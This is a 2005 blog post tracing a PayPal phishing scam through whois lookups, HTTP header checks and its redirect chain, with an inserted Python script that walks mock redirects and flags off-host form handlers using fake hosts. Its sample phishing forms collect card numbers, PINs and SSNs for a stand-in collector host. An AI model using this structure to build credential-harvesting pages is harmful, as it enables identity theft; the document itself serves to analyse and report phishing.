Another paypal scam / 2005-06-10

On a whim I decided to follow this one..

It linked to
Interesting reply from whois:


But the gtld nameservers are more helpful: name server name server

And it points at: has address

Which is hosted by.. Microsoft.

OrgName: Microsoft Corp
Address: One Microsoft Way
City: Redmond
StateProv: WA
PostalCode: 98052
Country: US

NetRange: -
NetHandle: NET-65-52-0-0-1
Parent: NET-65-0-0-0-0
NetType: Direct Assignment

Yeah, I'd like a usable answer to my previous queries.

Anyway. Asking for it:

$ lynx -head -dump
HTTP/1.1 302 Found
Connection: close
Date: Fri, 10 Jun 2005 16:30:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Expires: Sat, 01 Jan 2000 08:00:00 GMT
Content-Type: text/html

Later the forward stopped, but the page at the redirect is still up.

A nice redirect to where they have built a complete mockup
of the paypal login page, with all the right buttons pointing at the right
places at paypal. is at afrinic..

inetnum: -
netname: AVISONET
descr: ISP Cote d'Ivoire
country: CI
admin-c: ZJ59-AFRINIC
tech-c: AE496-AFRINIC

Some ISP in Côte d'Ivoire (sometimes home to a certain kind of people
from Nigeria with interesting financial propositions)

$ lynx -head -dump
HTTP/1.0 200 OK
Date: Fri, 10 Jun 2005 17:03:20 GMT
Server: Apache
Last-Modified: Thu, 05 Aug 2004 16:15:48 GMT
ETag: "341d4-29f6-41125d34"
Accept-Ranges: bytes
Content-Length: 10742
Content-Type: text/html
Age: 17017

The submit is to
which redirects to

This page looks like an 'error in your login data' page and asks for the
same login/password again. The funny thing is that they forgot to copy a pixel
image from paypal, or forgot to point at the right one, giving 404 errors and a
somewhat distorted page (in Firefox).

$ lynx -head -dump
HTTP/1.0 404 Not Found
Date: Fri, 10 Jun 2005 21:53:46 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1

The page submits the data to

Which redirects to (this is a pattern..)

Which gives an advert for a new 'immediate Paypal payment' option.

Another 'continue' button, which gets (using an 'onload' form)

with a bit about updated terms and conditions (loads of legalese. I did not
check for 'you just gave us access to all your paypal funds, thank you
very much' hidden in there).

And next comes up a page

(hey, I never clicked on one of those 'yes, I agree'
buttons..) asking for every last detail such as social security number,
mother's maiden name, drivers license, credit card number and pin for the
credit card. They do their identity theft seriously!

Oops, forgot to fill in the form. Wow, there is a real check for a CC number
in it (16 digits) and other checks for PIN length, the works. I was not
in the mood to find nonsense values for those. So I asked for the handler at

which redirected to

which says...

"Your information submitted successfully! Your information will be
reviewed shortly."

And a link to 'paypal home' at the real

Makes me wonder where all that information is sent..
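The chain described above (lure, redirect, mocked-up login, 'error' page, submit handler, final collector) is what a phishing kit walk-through usually looks like: each hop is a HEAD/GET without auto-following redirects, and at each landing page the interesting bit is where the form submits to. The script below is an added example, not code from the original post or from the phishing kit; it runs against a constructed in-memory set of responses with placeholder hostnames (`lure.example`, `mirror.example`, `collector.example`), so nothing here is a real server. Swap `fake_fetch` for a real requester that does not follow redirects to use it on a live lure.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample responses (status, headers, body) standing in for the
# lure's redirector, the mocked-up login page, its submit handler and the
# 'error' follow-up page. Placeholder hostnames; not the ones in the post.
FAKE_WEB = {
    "http://lure.example/go.aspx": (
        302, {"Server": "Microsoft-IIS/6.0",
              "Location": "http://mirror.example/pp/"}, ""),
    "http://mirror.example/pp/": (
        200, {"Server": "Apache", "Content-Type": "text/html"},
        '<html><body>'
        '<form name="login" method="post" action="cgi-bin/login.php">'
        '<input type="text" name="login_email">'
        '<input type="password" name="login_password">'
        '<img src="http://www.paypal.example/images/pixel.gif">'
        '</form></body></html>'),
    "http://mirror.example/pp/cgi-bin/login.php": (
        302, {"Server": "Apache", "Location": "../error.html"}, ""),
    "http://mirror.example/pp/error.html": (
        200, {"Server": "Apache", "Content-Type": "text/html"},
        '<form name="mailbomber" method="post" '
        'action="http://collector.example/cgi-bin/mailbomber.php">'
        '<input name="ssn"><input name="cc_number"><input name="cc_pin">'
        '</form>'),
}


def fake_fetch(url):
    """Stand-in for one HTTP request that does NOT auto-follow redirects.
    Unknown URLs get a 404, like the missing pixel in the post."""
    return FAKE_WEB.get(url, (404, {"Server": "Apache"}, ""))


def trace_redirects(url, fetch, max_hops=10):
    """Follow Location headers one hop at a time, recording status and
    Server header per hop. Stops at the first non-redirect, a loop, or
    max_hops. Relative Location values are resolved against the hop URL."""
    hops, seen = [], set()
    while url not in seen and len(hops) < max_hops:
        seen.add(url)
        status, headers, body = fetch(url)
        location = headers.get("Location")
        hops.append({"url": url, "status": status,
                     "server": headers.get("Server", "?"),
                     "location": urljoin(url, location) if location else None,
                     "body": body})
        if not (300 <= status < 400 and location):
            break
        url = urljoin(url, location)
    return hops


class FormParser(HTMLParser):
    """Collects every <form> with its resolved action, method and input
    names, and flags actions that post to a different host than the page."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url, self.forms, self._cur = page_url, [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            action = urljoin(self.page_url, a.get("action") or "")
            self._cur = {"name": a.get("name"),
                         "method": (a.get("method") or "get").lower(),
                         "action": action, "inputs": [],
                         "offsite": urlsplit(action).netloc
                         != urlsplit(self.page_url).netloc}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None and a.get("name"):
            self._cur["inputs"].append(a["name"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None


def extract_forms(page_url, html):
    parser = FormParser(page_url)
    parser.feed(html)
    return parser.forms


def walk_scam(start_url, fetch, max_pages=10):
    """Trace the lure to its landing page, then request each page's first
    form handler (as the post did) and trace where that redirects, until a
    form posts off-host: that action is where the stolen data goes."""
    report, url = [], start_url
    for _ in range(max_pages):
        hops = trace_redirects(url, fetch)
        landing = hops[-1]
        forms = extract_forms(landing["url"], landing["body"])
        report.append({"chain": [(h["url"], h["status"], h["server"]) for h in hops],
                       "landing": landing["url"], "forms": forms})
        if not forms or forms[0]["offsite"]:
            break
        url = forms[0]["action"]
    return report


if __name__ == "__main__":
    for page in walk_scam("http://lure.example/go.aspx", fake_fetch):
        for hop_url, status, server in page["chain"]:
            print(f"{status} {server:20} {hop_url}")
        for f in page["forms"]:
            flag = "OFF-HOST" if f["offsite"] else "same host"
            print(f"   form {f['name']!r} -> {f['action']} ({flag}) {f['inputs']}")
```

Requesting a POST handler with a plain GET, as the post does, is often enough to see the next redirect because these kits redirect unconditionally after mailing the submitted fields; the off-host form action on the last page is the address worth reporting to the hosting provider.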

The form name used is 'mailbomber' and a Google search for 'paypal' and
'mailbomber' shows that this is a well-known script for paypal account